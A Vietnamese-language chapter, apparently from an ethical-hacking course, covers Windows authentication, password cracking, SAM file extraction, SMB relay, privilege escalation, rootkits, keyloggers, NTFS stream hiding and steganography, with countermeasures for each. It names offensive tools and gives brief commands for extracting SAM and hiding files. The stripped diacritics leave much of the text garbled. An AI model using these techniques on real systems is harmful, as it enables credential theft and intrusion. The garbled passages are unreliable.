LM Authentication cung cp kh nng tng thch vi h iu hnh trc , bao gm Windows 95, Windows 98 v Windows NT 4.0 Service Pack 3 hoc sm hn. Ngoi ra cn c cc ng dng trc m c th da vo c ch xc thc ny. Tuy nhin, giao thc LM l yu nht, v d dng nht tn cng. Khng s dng chng thc LM trong mt mi trng Windows Server 2003. Nng cp cc my tnh da trn giao thc LM loi b l hng bo mt ny. Storing LM passwords L do chnh khng s dng giao thc LM l khi mt khu c to ra bi ngi s dng v c lu tr s dng, mt khu c chuyn i LMHash mt ln. LMHash cha tn ngi dng v hash ca mt khu tng ng. Hash l mt hnh thc m ha mt chiu. Khi mt khch hng c gng xc thc vi chng thc LM cc hash ca mt khu c truyn trn mng. My ch ch c th xc thc ngi s dng nu my ch c lu tr LMHash . LMHash c mt vi im yu m lm cho n d b tn cng hn Hash NT. Cc LMHash c lu tr l cc ch hoa, c gii hn trong 14 k t. Nu c hiu bit, k tn cng c c quyn truy cp vo LMHashes ly c mt s lng ln ngi s dng, c kh nng l k tn cng s gii m c mt khu. Bng 8.3: V d v mt khu v cc LMHashes tng ng m c th c lu tr. Ch rng vi hash ca mt khu lun c 14 k t, nu cha th k t E (m 16) c thm vo sau cng. Trong qu trnh tnh ton cc hash, mt khu ban u c chia thnh hai b by k t. Nu mt khu l by k t hoc t hn, tp th hai ca by k t l null. iu ny dn n cc k E cui cng l mt gi tr gip cho k tn cng bit cc mt khu ban u l t hn tm k t. iu ny gip k tn cng gim bt thi gian d tm m. V hiu ha mt khu LM Windows Server 2003 cho php bn v hiu ha cc LMHash loi b cc l hng c trnh by trn. Tuy nhin, nu bn c client ang chy Windows 3.1 hoc bn pht hnh ban u ca Windows 95 kt ni vi mt my tnh chy Windows Server 2003, th bn khng v hiu ha cc LMHash. Tuy nhin, bn vn c th v hiu ha vic s dng LMHash trn c s account-by-account bng cch lm mt trong nhng iu sau y:

S dng mt khu vi 15 k t hoc di hn. Kch hot cc gi tr registry NoLMHash cc b trn mt my tnh hoc bng cch s dng chnh sch an ninh. S dng cc k t ALT trong mt khu. K t ALT c a vo mt mt khu bng cch gi phm ALT, g cc phm s, v sau th phm ALT.

NTLM Authentication Nh cp trc , NTLM bao gm ba phng php xc thc challenge-response: LM, NTLMv1, v NTLMv2. Qu trnh xc thc cho tt c cc phng php l nh nhau, nhng chng khc nhau mc m ha.

Qu trnh xc thc Cc bc sau y chng t qu trnh ca mt s kin xc thc xy ra khi mt client xc nhn n domain controller bng cch s dng bt k cc giao thc NTLM:

Hnh 8. 5: M hnh chng thc NTLM 1. Cc client v server thng lng mt giao thc xc thc. iu ny c thc hin thng qua vic thng lng nh cung cp dch v h tr bo mt ca Microsoft (Security Support Provider). Client gi tn ngi dng v tn min ti domain controller. 2. 2. Domain controller chn ngu nhin 16 byte to ra mt chui k t c gi l nonce 3. Client m ha nonce ny vi mt hash ca mt khu v gi n tr li domain controller. 4. Domain controller tr li hash ca mt khu t c s d liu ti khon bo mt. 5. Domain controller s dng cc gi tr bm ly t c s d liu ti khon bo mt m ha nonce. Gi tr ny c so snh vi gi tr nhn c t client Nu cc gi tr ph hp, client c chng thc.

Giao thc chng thc Kerberos


L mt giao thc xc thc mc nh cho Windows Server 2003, Windows 2000 v Windows XP Professional. Kerberos c thit k c an ton hn v kh nng m rng hn so vi NTLM trn mng ln. Kerberos cung cp thm cc li ch sau y:

Hiu qu (Efficiency): Khi mt my ch cn xc thc mt client, my ch Kerberos c th xc nhn cc thng tin ca client m khng cn phi lin h vi domain controller. T chng thc (Mutual authentication) Ngoi vic chng thc cliet n server, Kerberos cho php my ch xc thc ln nhau. y quyn chng thc (Delegated authentication): Cho php cc dch v ng vai client khi truy cp vo ti nguyn. n gin ha qun l (TrustKerberos): c th s dng trust gia cc domain trong cng mt forest v cc domain kt ni vi mt forest. Kh nng cng tc ( Interoperability): Kerberos c da trn tiu chun Internet Engineering Task Force (IETF) v do tng thch vi IETF khc tun theo li Kerberos.

Quy trnh xc thc Kerberos Giao thc Kerberos ly tng t cc con ch ba u trong thn thoi Hy Lp. Ba thnh phn ca Kerberos l:

1. Cc client yu cu dch v hoc chng thc. 2. Cc server lu tr cc dch v theo yu cu ca client. 3. Mt my tnh c ngha l ng tin cy ca khch hng v my ch (trong trng hp ny, Windows Server 2003 domain controller chy dch v Kerberos Key Distribution Center). Xc thc Kerberos c da trn cc gi d liu nh dng c bit c gi l ticket. Trong Kerberos, cc ticket i qua mng thay v mt khu. Truyn ticket thay v mt khu lm cho qu trnh xc thc tng kh nng chng tn cng. Kerberos Key Distribution Center Key Distribution Center (KDC) duy tr mt c s d liu cc thng tin ti khon cho tt c cc hiu trng an ninh (security principals) trong min. Cc KDC lu tr mt kho mt m ch c cc nsecurity principals c bit n. Kha ny c s dng giao tip gia security principals v KDC, v c bit n nh mt cha kha di hn. Cha kha di hn c bt ngun t mt khu ng nhp ca ngi dng. Qu trnh xc thc Kerberos Sau y l m t mt phin giao dch (gin lc) ca Kerberos. Trong : AS = My ch chng thc (authentication server), TGS = My ch cp v (ticket granting server), SS = My ch dch v (service server). Mt cch vn tt: ngi s dng chng thc mnh vi my ch chng thc AS, sau chng minh vi my ch cp v TGS rng mnh c chng thc nhn v, cui cng chng minh vi my ch dch v SS rng mnh c chp thun s dng dch v.

Hnh 8. 6: M t vn tt quy trnh chng thc Kerberos 1. Ngi s dng nhp tn v mt khu ti my tnh ca mnh (my khch). 2. Phn mm my khch thc hin hm bm mt chiu trn mt khu nhn c. Kt qu s c dng lm kha b mt ca ngi s dng. 3. Phn mm my khch gi mt gi tin (khng gi mt m ha) ti my ch dch v AS yu cu dch v. Ni dung ca gi tin i : ngi dng XYZ mun s dng dch v. Cn ch l c kha b mt ln mt khu u khng c gi ti AS. 4. AS kim tra nhn dng ca ngi yu cu c nm trong c s d liu ca mnh khng. Nu c th AS gi 2 gi tin sau ti ngi s dng:

Gi tin A: Kha phin TGS/client c mt m ha vi kha b mt ca ngi s dng. Gi tin B: Chp Thun V (bao gm ch danh ngi s dng (ID), a ch mng ca ngi s dng, thi hn ca v v Kha phin TGS/client) c mt m ha vi kha b mt ca TGS.

1. Khi nhn c 2 gi tin trn, phn mm my khch gii m gi tin A c kha phin vi TGS. (Ngi s dng khng th gii m c gi tin B v n c m ha vi kha b mt ca TGS). Ti thi im ny, ngi dng c th xc thc mnh vi TGS. 2. Khi yu cu dch v, ngi s dng gi 2 gi tin sau ti TGS:

Gi tin C: Bao gm V chp thun t gi tin B v ch danh (ID) ca yu cu dch v. Gi tin D: Phn nhn thc (bao gm ch danh ngi s dng v thi im yu cu), mt m ha vi Kha phin TGS/my khch.

1. Khi nhn c 2 gi tin C v D, TGS gii m D ri gi 2 gi tin sau ti ngi s dng:

Gi tin E: V (bao gm ch danh ngi s dng, a ch mng ngi s dng, thi hn s dng v Kha phin my ch/my khch) mt m ha vi kha b mt ca my ch cung cp dch v. Gi tin F: Kha phin my ch/my khch mt m ha vi Kha phin TGS/my khch.

1. Khi nhn c 2 gi tin E v F, ngi s dng c thng tin xc thc vi my ch cung cp dch v SS. My khch gi ti SS 2 gi tin:

Gi tin E thu c t bc trc (trong c Kha phin my ch/my khch mt m ha vi kha b mt ca SS). Gi tin G: phn nhn thc mi, bao gm ch danh ngi s dng, thi im yu cu v c mt m ha vi Kha phin my ch/my khch.

1. SS gii m V bng kha b mt ca mnh v gi gi tin sau ti ngi s dng xc nhn nh danh ca mnh v khng nh s ng cung cp dch v:

Gi tin H: Thi im trong gi tin yu cu dch v cng thm 1, mt m ha vi Kha phin my ch/my khch.

10. My khch gii m gi tin xc nhn v kim tra thi gian c c cp nht chnh xc. Nu ng th ngi s dng c th tin tng vo my ch SS v bt u gi yu cu s dng dch v. 11. My ch cung cp dch v cho ngi s dng.

3. K Thut Crack Password


Cng Ngh Crack Password
C rt nhiu hacker n lc trong vic b kha password. Passwords l chic cha kha, thng tin cn thit truy cp h thng. User, khi m h to ra password thng l nhng password kh on. Nhiu password c ti s dng hoc chn mt k t, hoc l mt tn no gip h d nh n. Bi v yu t con ngi nn c rt nhiu password c b gy thnh cng.

N l im mu cht ca qu trnh leo thang, thc thi ng dng, n file, v che du thng tin. Password c th c b th cng hoc tm trong t in. Crack password th cng lin quan n vic c gng ng nhp vi mt password khc. Cc bc m hacker tin hnh: 1. 2. 3. 4. 5. Tm ti khon ngi dng (c th l ti khon administractor hoc khch) To ra mt danh sch cc mt khu c th Xp hng cc mt khu c xc xut t cao xung thp Mc quan trng ca mt khu. C gng lm i lm li cho n khi no b password thnh cng

Hnh 8. 7: Cc bc cack password th cng Mt hacker c gng to ra tp tin kch bn vi mi password trong danh sch. Nhng y ch l cch th cng, n thng tn nhiu thi gian v khng hiu qu. tng hiu qu, hacker c th s dng nhng cng c h tr cho vic truy tm mt khu mt cch t ng. Mt cch hiu qu hn ph mt khu l truy cp vo cc tp tin mt khu trn h thng. Hu ht cc mt khu c m ha lu tr trong h thng. Trong lc ng nhp vo h thng, password do ngi dng nhp vo thng c m ha bng cc thut ton v sau so snh vi password c lu trong file. Mt hacker c th c gng truy cp vo server ly file, bng cc thut ton thay v c gng on hoc nu khng xc nh c password. Nu hacker thnh cng, h c th gii m password lu tr trn server. Mt khu c lu trong file SAM trn Windows v trong file Shadow trn Linux
Hacking Tools

Gii thiu mt s phn mm d tm password. Hacker c th t ng on mt khu trong cc phin bn ca NetBIOS. Hacker qut qua nhiu a ch IP trn cc h thng chia s v thng tn cng bng cc cng c th cng. NTInfoScan l mt my qut an ninh. Qut tt c cc l hng to ra mt bo co da vo cc vn an ninh c tm thy trn my ch v mt s thng tin khc. LophtCrack l phn mm khi phc mt khu v cc gi phn mm c phn phi bi cng ty @stake software, nhng by gi thuc s hu ca Symantec. y l phn mm chn cc gi tin trn mng v nm bt cc phin ng nhp c nhn. LophtCrack cha t in hnh ng v kh nng tn cng li.

John the ripper l mt cng c dng lnh c thit k crack mt khu c Unix v NT. Cc mt khu phn bit trng hp dng ch v c th khng thnh cng cho mt khu hn hp. Kerbcrack bao gm hai chng trnh: kerbsniff v kerbcrack sniffer. Vic lng nghe kt ni vi internet v bt gi phin ng nhp trong Windows 2000/XP, s dng thut ton Kerberos. Soft ny c th c s dng tm cc mt khu t cc tp tin bt bng cch tn cng vo h thng.

B Kha Password Windows 2000


Ti khon c lu trong file gm usernames v password m ha. N nm v tr theo ng dn: Windows\system32\config. y l file kha, khi h thng ang chy. Hacker khng th sao chp file khi h thng ang khi ng. Mt la chn cho vic sao chp tp tin ny l khi ng t dos hoc trong linux th khi ng t CD, hoc sao chp t th mc repair. Nu mt qun tr vin h thng s dng cc tnh nng RDISK ca Windows sao lu h thng, sau mt bn sao ca tp tin nn c gi l SAM._ c to ra trong C:\windows\repair. m file, bn s dng lnh sau ti du nhc lnh. C:>expand sam._sam Sau tp tin khng cn c nn, cc kiu tn cng dictionary, hybrid, or brute-force c th c p dng khai thc file SAM.
Hacking Tools

Win32CreateLocalAdminUser: l chng trnh to ngi dng mi vi username v password l X v thm ngi dng vo nhm qun tr vin. Phn mm ny l mt d n ca Metasploits v c th a vo th vin netframwork ca window. Offline NT Password Resetter l phng thc t li password ca ngi qun tr h thng khi h thng khng khi ng c window. a s cc phng php khi ng h iu hnh linux bng CD vi phn vng l NTFS m h iu hnh khng c password bo v, nn c th thay i password .

K Thut Tn Cng Chuyn Hng


Mt hng khc khm ph mt khu trn mng l chuyn hng ng nhp ca my ch, lm chn gi tin nhn n my khch, m gi password n cho hacker. lm c iu ny hacker phi gi nhng phn hi xc thc t server v la nn nhn vo ca s xc thc ca k tn cng. Mt k thut ph bin l gi n nn nhn mt email vi mt lin kt la o, khi lin kt c click, th ngi dng v tn gi thng tin ca h qua mng. Chuyn hng SMB (Server Message Block) Mt s phn mm c th t ng thc hin chuyn hng.

SMBRelay l phn mm c th capture li tn ng nhp v mt khu m ha. y c th gi l phn mm trung gian ca k tn cng. SMBRelay2 l phn mm ging SMBRelay nhng dng tn NetBIOS ca a ch IP ghi li tn ng nhp v mt khu. pwdump2 l chng trnh ghi li chnh xc mt khu m ha trong file ca h thng window. Mt khu chnh xc c th chy cng vi chng trnh b password Lophtcrack. samdump l mt chng trnh gii m mt khu m ha t mt tp tin SAM. c2MYAZZ l mt chng trnh phn mm gin ip lm cho cc ca s khch hng gi mt khu di dng vn bn r rng. N s hin th tn ngi dng v mt khu ca h nh l ngi s dng gn vi ti nguyn my ch .

Tn Cng SMB Relay MITM & Bin Php i Ph


Tn Cng SMB Relay MITM l khi k tn cng ci t la my ch vi a ch no (Relay Address). Khi client l nn nhn (victim client) kt ni ti my ch la o, cc MITM server chn phin li, m ha password, v chuyn kt ni ti my ch nn nhn.

Hnh 8. 8: SMB relay MITM attack Bin php i ph bao gm cc cu hnh trong windows 2000 dng SMB. m ha khi thng tin lin lc. Thit lp ny c tm thy trong ng dn Security Policies/Security Options.
Hacking Tools

SMBGrind l phn mm lm tng tc lm vic bng cch loi b bt cc trng lp v cung cp cc tin ch cho ngi s dng m ngi dng khng cn chnh sa bng cch th cng SMBDie l cng c x l s c my tnh chy window 2000/xp/NT bng cch gi cc yu cu thit k c bit SMB. NBTdeputy l mt chng trnh c th ng k mt tn my tnh NetBIOS trn mng v ng ph vi NetBIOS thng qua yu cu TCP IP. Tn truy vn ca n c n gin ho. Gip vic s dng cc SMBRelay c th c gi bng tn my tnh thay v a ch ip.

Tn Cng NetBIOS Dos


Tn cng NetBIOS Denial of Service (DoS) bng cch gi bn tin NetBIOS Name Release n dch v NetBIOS Name Service trn h thng mc tiu chy h iu hnh Windows v ngay lp tc h thng qu ti, khng p ng c cc yu cu ngi dng na.

L cch tn cng bng cch gi cc thng ip t chi my ch. Cc cng c ca my c th t tn li cho cuoc tn cng . Do cuc tn cng ch yu t pha my khch hng .To ra mt mng li tn cng dos rng ln .
Hacking Tools

NBName l cng c c th disable ton b mng LAN v ngn chn cc my trong h thng ca chng. Cc nt trn mt mng Net-BIOS b nhim, m chng li cng trn mi trng mng nn chng ngh rng tn ca chng sn sng s dng bi mt my tnh khc.

4. Bin Php i Ph Vi Crack Password


1. Password quan trng nht l phi thc hin nhim v bo v. Password phi bao gm t 8-12 k t hoc ch s. di ca mt khu c bn ti phn trc. 2. bo v cc thut ton m ha cho cc mt khu c lu tr trn my ch, bn phi c c th c lp v bo v my ch. Ngi qun tr h thng c th s dng tin ch Syskey trong cc ca s bo v mt khu c lu tr trn cng my ch. Nht k my ch cng nn c theo di cho cc cuc tn cng brute-force trn cc ti khon ngi dng. 3. Mt vin qun tr h thng c th thc hin cc bin php phng nga bo mt sau gim nhng ri do cho mt khu ca ngi qun tr cng nh ngi dng.

ng bao gi mt password mc nh ng bo gi dng password trong t in Khng nn dng password lin quan ti tn host ,tn min ,hoc bt k ci g m hacker d on c. Khng nn dng password lin quan ti ngy k ngh ca bn, vt nui, thn nhn hoc ngy sinh nht. Dng mt t c nhiu hn 21 k t trong t in lm password.

Thi Hn Mt Khu Khi mt khu ht hn sau mt khong thi gian th buc ngi dng phi thay i mt khu. Nu mt khu c thit lp thi hn qu ngn, c th l ngi dng s qun mt khu hin ti, kt qu l ngi qun tr h thng s phi thit lp li password thng xuyn. Mt trng hp khc l nu password cho php ngi dng thit lp thi hn qu di th mc an ton s b tn thng. Mt li ngh l password nn thay i trong khong 30 ngy. Ngoi ra, cng ngh l khng cho php ngi dng dng li password 3 ln. Theo Di Ngi Dng ng Nhp Vo H Thng Ngi qun tr h thng phi theo di ton b s thm nhp h thng ca hacker, trc khi m h xm nhp hoc l h ang xm nhp. Ni chung, vi ln tht bi s c lu li trong h thng, trc khi mt cuc tn cng xm nhp thnh cng hay ph c mt khu. Nht k s an ton tt n mc no l do ngi qun tr h thng, ngi phi theo di qu trnh ng nhp. Cng c tm kim VisuaLast h tr ngi ngi qun tr mng gii m v phn tch trong file c m ha an ton. Visualast cung cp mt ci nhn ton b gip ngi qun tr

c ci nhn ton b v nh gi chnh xc, hiu qu. Chng trnh cho php ngi qun tr xem v bo co c nhn v qu trnh ng nhp v ng xut. N ghi li s kin chnh xc trn tng trang, v l ti liu v gi cho cc nh phn tch an ninh. S kin ny c lu theo ng dn c:\windows\system32\config\sec.evt. y l ng dn cha du vt ca k tn cng.

Phn 2: Escalating Privileges


Escalating Privileges (K Thut Leo Thang c Quyn) Leo thang c quyn l bc th ba trong chu trnh Hacking System, leo thang c quyn v c bn c ngha l thm nhiu quyn hn hoc cho php mt ti khon ngi dng thm quyn, leo thang c quyn lm cho mt ti khon ngi dng c quyn nh l ti khon qun tr. Ni chung, cc ti khon qun tr vin c yu cu mt khu nghim ngt hn, v mt khu ca h c bo v cht ch hn. Nu khng th tm thy mt tn ngi dng v mt khu ca mt ti khon vi quyn qun tr vin, mt hacker c th chn s dng mt ti khon vi quyn thp hn. Ti trng hp ny, cc hacker sau phi leo thang c quyn c nhiu quyn nh quyn ca qun tr. Ci ny c thc hin bng cch nm ly quyn truy cp bng cch s dng mt ti khon ngi dng khng phi l qun tr vin. Thng bng cch thu thp cc tn ngi dng v mt khu thng qua mt bc trung gian gia tng cc c quyn trn ti khon vi mc qun tr vin. Mt khi hacker c mt ti khon ngi dng hp l v mt khu, cc bc tip theo l thc thi cc ng dng ni chung hacker cn phi c mt ti khon c quyn truy cp cp qun tr vin ci t chng trnh. l l do ti sao leo thang c quyn l rt quan trng. Trong cc phn k tip , chng ti s xem nhng g hacker c th lm vi h thng ca bn mt khi h c quyn qun tr.
Hacking Tools

Getadmin.exe l mt chng trnh nh n c th thm mt ngi dng vo nhm Local Administrator. Mt vi kernel NT cp thp, thng xuyn truy cp cho php qu trnh chy. Mt ng nhp vo giao din iu khin my ch l cn thit thc hin chng trnh. Getadmin.exe c chy t dng lnh v ch hot ng trn Win NT 4.0 Service Pack 3. Tin ch HK.exe l ra k h trong giao thc gi hm cc b (Local Procedure Call) ca Windows NT. Mt ngi dng c th l khng phi ngi qun tr c th leo thang vo nhm qun tr vin bng cch s dng cng c ny.

Phn 3: Executing Applications

Mt khi hacker c th truy cp ti khon vi quyn qun tr, iu tip theo cn lm l thc thi cc ng dng trn h thng ch. Mc ch ca vic thc thi ng dng c th ci t mt ca sau trn h thng, ci t mt keylogger thu thp thng tin b mt, sao chp cc tp tin, hoc ch gy thit hi c bn cho h thng, bt c iu g hacker mun lm trn h thng. Mt khi hacker c th thc thi cc ng dng, h thng ph thuc vo s kim sot ca hacker.
Hacking tools

PsExec l mt chng trnh kt ni vo v thc thi cc tp tin trn h thng t xa. Phn mm khng cn phi c ci t trn h thng t xa. Remoxec thc thi mt chng trnh bng cch s dng dch v RPC (Task Scheduler) hoc WMI (Windows Management Instrumentation). Administrators vi mt khu rng hay yu c th khai thc thng qua lch trnh cng vic (Task Scheduler 1025/tcp) hoc ch phn phi thnh phn i tng (Distributed Component Object Mode; 135/tcp).

1. Buffer Overflows
Hacker c gng khai thc mt l hng trong m ng dng (Application). V bn cht, cuc tn cng trn b m gi qu nhiu thng tin cho mt bin no trong ng dng, c th gy ra li ng dng. Hu ht cc ln, ng dng khng bit hnh ng tip theo bi v n c ghi bng cc d liu b trn. V th n hoc thc thi cc lnh trong cc d liu b trn hoc gim trong mt du nhc lnh cho php ngi dng nhp lnh tip theo ny. Du nhc lnh (command prompt hoc shell) l cha kha cho hacker c th c s dng thc thi cc ng dng khc. Chuyn v Buffer Overflows s c tho lun chi tit trong chng 19: Buffer Overflows

2.

Rootkits

RootKits: phn mm dn ip Rootkit l mt loi chng trnh thng c s dng che du cc tin ch trn h thng b xm nhp. Rootkit bao gm ci gi l back doors, n gip cho k tn cng truy cp vo h thng s d dng hn trong ln sau. V d, cc rootkit c th n mt ng dng, ng dng ny c th sinh ra mt lnh kt ni vo mt cng mng c th trn h thng. Back door cho php cc qu trnh bt u bi mt ngi khng c c quyn, dng thc hin chc nng thng dnh cho cc qun tr vin. Rootkit thng xuyn c s dng cho php lp trnh vin ra rootkit c th xem v truy cp vo tn ngi dng v thng tin ng nhp trn cc trang site c yu cu h. Khi nim Site y khng phi l website, m l mt min (domain) trong h thng cc my tnh. Mt s loi rootkit thng gp:

Kernel-level rootkits: Rootkit cp Kernel thng thm hoc thay th mt vi thnh phn ca nhn h thng, thay bng m c sa i gip che giu mt chng trnh trn h thng my tnh. iu ny thng c thc hin bng cch thm m mi cho nhn h thng thng qua mt thit b a c kh nng np m-un, chng hn nh cc kernel m-un c th np c trong linux hoc cc thit b iu khin trong Microsoft Windows. Rootkit c bit nguy him bi v n c th kh pht hin m khng c phn mm ph hp. Library-level rootkits: Rootkit cp th vin thng chp v, sa cha, hoc thay th h thng. Mt s phin bn c th giu thng tin ty theo mc ch ca hacker. Application-level rootkits: Rootkit cp ng dng th c th thay th nhng chng trnh ng dng ging trojan c hi, hoc h c th thay i hnh vi ca cc ng dng hin c bng cch s dng cc mc (hook), cc bn v li (patch), m c hi (injected code), hoc cc phng tin khc. Trong cc phn sau s tho lun qu trnh ly nhim ca rootkit cho mt h thng .

Trin khai Rootkits trn Windows 2000 & XP


Trong h iu hnh Window NT/2000 th rookit c xy dng nh mt trnh iu khin ch kernel ca driver, c th c t ng np trong ch runtime. Rootkit c th chy vi c quyn h thng (system privileges ) trong NT Kernel. Do , n truy cp vo tt c cc ngun ti nguyn ca h iu hnh. Cc rootkit cng c th n cc quy trnh, n cc tp tin, n cc mc ng k, t hp phm tt trn h thng, giao din iu khin, pht hnh gin on tng bc gy ra mt mn hnh mu xanh ca s cht chc (death) v chuyn cc tp tin EXE. Rootkit ny c cha mt trnh iu khin hot ng ch kernel (kernel mode device driver) c tn gi l _root_.sys v khi chy chng trnh c tn l DEPLOY.EXE. Sau khi t c quyn truy cp vo h thng, chng copy file -root-.sys v DEPLOY.EXE thnh nhiu file vo h thng v thc thi file DEPLOY.EXE. Sau s ci t trnh iu khin thit b rootkit v k tn cng bt u xa DEPLOY.EXE t cc my tnh mc tiu. Nhng k tn cng sau c th dng li v khi ng li cc rootkit bng cch s dng lnh net stop _root_and _root_ v cc tp tin _root_.sys khng cn xut hin trong danh sch th mc. Rootkit chn khng cho h thng gi tp tin trong danh sch v giu tt c cc file bt u vi _root_ . Trong h iu hnh, c hai ch hot ng l usermode v kernel mode. Vi Kernel mode, cc trnh ng dng c ton quyn truy cp vng nh ca RAM, cc ch lnh CPUni chung l ton quyn.

Rootkit c nhng vo giao thc TCP/IP


Mt tnh nng mi ca rootkit trong window NT/2000 l n hot ng bng cch xc nh tnh trng kt ni da trn cc d liu trong gi d liu n (incoming). Rootkit c mt a ch IP

c nh m n s tr li. Rootkit s dng cc kt ni Ethernet qua h thng card mng, v th n rt mnh m. Mt hacker c th kt ni n port bt k trn h thng. Ngoi ra, n cho php nhiu ngi c th ng nhp cng mt lc.

Phng chng Rootkit


Tt c cc rootkit truy cp h thng ch c quyn ging nh qun tr vin (administrator), do , bo mt mt khu l rt quan trng. Nu bn pht hin mt rootkit, li khuyn rng bn nn sao lu d liu quan trng v ci t li h iu hnh v cc ng dng t mt ngun ng tin cy. Cc qun tr vin cng nn gi sn mt ngun ng tin cy ci t v phc hi t ng. Bin php i ph khc l s dng thut ton m ha MD5, checksum MD5 ca mt tp tin l mt gi tr 128-bit, n ging nh l du vn tay tp tin. Thut ton ny c thit k pht hin s thay i, ngay c mt cht trong tp tin d liu, kim tra cc nguyn nhn khc nhau. Thut ton ny c tnh nng rt hu ch so snh cc tp tin v m bo tnh ton vn ca n. Mt tnh nng hay l kim tra chiu di c nh, bt k kch thc ca tp tin ngun l nh th no. Vic tng kim tra MD5 m bo mt file khng thay i ny c th hu ch trong vic kim tra tnh ton vn file nu rootkit c tm thy trn h thng. Cc cng c nh Tripwire c thc hin kim tra MD5, xc nh cc tp tin c b nh hng bi rootkit hay khng.
Countermeasure Tools

Tripwire l mt chng trnh kim tra tnh ton vn h thng tp tin h iu hnh Unix, Linux, thm vo kim tra mt m mt hoc nhiu ni dung trong mi th mc v tp tin. Tripwire c c s d liu cha thng tin cng cho php bn xc minh, cho php truy cp v ci t ch tp tin, tn ngi dng ch s hu tp tin, ngy thng v thi gian tp tin c truy cp ln cui, v sa i cui.

3. Keyloggers and Other Spyware


Nu tt c nhng n lc thu thp mt khu khng thnh cng, th keylogger l cng c la chn cho cc hacker. c thc hin nh l phn mm c ci t trn my tnh hoc l phn cng gn vo my tnh. Keylogger l cc phn mm n, ngi gia phn cng (bn phm) v h iu hnh, h c th ghi li mi phm tt. Keylogger phn mm c th ph hoi h thng nh Trojans hoc viruses. Keylogger l phn mm gin ip c dung lng nh, gip kt ni cc bn phm my tnh v lu tt c cc thao tc phm vo mt file. Hacker c th ci thm tnh nng l t ng gi ni dung file n my ch ca hacker.

i vi kiu keylogger cng, c mt thit b, ging usb, c gn vo my tnh. Qu trnh thao tc phm c ghi li trong usb . lm c iu ny th mt hacker phi c quyn truy cp vt l vo h thng. Keylogger cng thng c ci cc im internet cng cng c xu. Do khi truy cp net ti ni cng cng, bn nn quan st k lng cc thit b bt thng c cm vo my tnh.
Hacking Tools

Spector l phn mm gin ip ghi li mi iu t h thng no trn mng Internet, ging nh mt camera gim st t ng. Spector c hng trm bc nh chp mi gi ca bt c th g trn mn hnh my tnh v lu nhng bc nh chp mt v tr n trn a cng ca h thng. Spector c th c pht hin v loi b b phn mm chng Spector. eBlaster l phn mm gin ip internet chp cc email gi n v gi i, v ngay lp tc chuyn chng n mt a ch email. Eblaster cng c th chp c hai mt ca mt cuc hi thoi nhn tin tc thi (Instant Messenger), thc hin t hp phm ng nhp v cc trang web truy cp thng xuyn. Spyanywhere l mt cng c cho php bn xem cc hot ng h thng v hnh ng ca ngi s dng, tt/khi ng li my, kha/ng bng, v ngay c trnh duyt g b tp tin h thng. Spyanywhere cho php bn kim sot chng trnh m v ng ca s trn h thng t xa v xem lch s internet v cc thng tin lin quan. Kkeylogger l mt phn mm gin ip hiu sut cao, trnh iu khin thit b o, chy m thm mc thp nht ca h iu hnh Windows 95/98/ME. Tt c cc t hp phm c ghi li trong mt tp tin. Email keylogger l phn mm ghi li tt c cc email c gi v nhn trn mt h thng. Mc tiu cc hacker l c th xem ngi gi, ngi nhn, ch , v thi gian/ngy. ni dung email v bt k file nh km cng c ghi li.

Phn 4: Hiding Files


Mt hacker c th mun che du cc tp tin trn mt h thng, ngn chn b pht hin, sau c th c dng khi ng mt cuc tn cng khc trn h thng. C hai cch n cc tp tin trong Windows. u tin l s dng lnh attrib. n mt tp tin vi lnh attrib, g nh sau ti du nhc lnh: attrib +h [file/directory]

Cch th hai n mt tp tin trong Windows l vi lung d liu xen k NTFS (alternate data streaming ADS).

1. NTFS File Streaming


NTFS s dng bi Windows NT, 2000, v XP c mt tnh nng gi l ADS cho php d liu c lu tr trong cc tp tin lin kt n mt cch bnh thng, c th nhn thy c tp tin. Streams khng gii hn v kch thc, hn na mt stream c th lin kt n mt file bnh thng. to v kim tra NTFS file stream, ta thc hin cc bc sau:

1. 1.
2.

3. 4.
5.

6. 7.

Ti dng lnh, nhp vo notepad test.txt t mt s d liu trong tp tin, lu tp tin, v ng notepad Ti dng lnh, nhp dir test.txt v lu kch thc tp tin Ti dng lnh, nhp vo notepad test.txt:hidden.txt thay i mt s ni dung vo Notepad, lu cc tp tin, v ng n li. Kim tra kch thc tp tin li (ging nh bc 3). M li test.txt. bn ch nhn thy nhng d liu ban u. 7. Nhp type test.txt:hidden.txt ti dng lnh mt thng bo li c hin th. The filename, directory name, or volume label syntax is incorrect.

Hacking Tools

Makestrm.exe l mt tin ch chuyn d liu t mt tp tin vo mt tp tin lin kt ADS v thay th lin kt vi cc tp tin ban u.

NTFS File Streaming Countermeasures

xa mt stream file, u tin l copy n n phn vng FAT, v sau cpoy n trvo phn vng NTFS. Stream b mt khi tp tin c chuyn n phn vng FAT, v n c mt tnh nng ca phn vng NTFS v do ch tn ti trn mt phn vng NTFS.
Countermeasure Tools

Bn c th s dng LNS.exe pht hin ra Stream. LNS bo co s tn ti v v tr ca nhng file cha d liu stream.

2. Steganography Technologies

Steganography l qu trnh giu d liu trong cc loi d liu khc nh hnh nh hay tp tin vn bn. Cc phng php ph bin nht ca d liu n trong cc tp tin l s dng hnh nh ha nh l ni ct giu. K tn cng c th nhng cc thng tin trong mt tp tin hnh nh bng cch s dng steganography. Cc hacker c th n cc ch dn thc hin mt qu bom, s b mt ca ti khon ngn hng Hnh ng bt k c th c n trong hnh nh. i vi file hnh nh JGP, c mt thut ton gi l Disrete Sosine Transform (DCT) m ha, nn thm d liu n vo trong file. Thut ton ny tnh bng cng thc nh sau:

Hacking Tools

1. Imagehide l mt chng trnh steganography, n giu s lng ln vn bn trong


hnh nh. Ngay c sau khi thm d liu,vn khng c s gia tng kch thc hnh nh, hnh nh trng ging nh trong mt chng trnh ha bnh thng. N np v lu cc tp tin v do l c th trnh c nghe ln. Blindside l mt ng dng steganography m giu thng tin bn trong nh BMP (bitmap). l mt tin ch dng lnh. MP3stego giu thng tin trong file mp3 trong qu trnh nn. D liu c nn, m ha, v chng n trong cc dng bit MP3. Snow l mt chng trnh whitespace steganography c ngha l che giu thng ip trong ASCII text, bng cch ph thm cc khong trng cui file. V spaces and tabs khng th nhn thy ngi xem vn bn. Nu c s dng mt thut ton m ha, tin nhn khng th c ngay c khi n b pht hin. Camera/shy lm vic vi Window v trnh duyt Internet Explorer, cho php ngi dng chia s tm kim hoc thng tin nhy cm c lu gi trong mt hnh nh GIF thng. Stealth l mt cng c lc, cho cc tp tin PGP. N loi b thng tin nhn dng t tiu , sau cc tp tin c th c s dng cho steganography.

2. 3. 4.

5. 6.

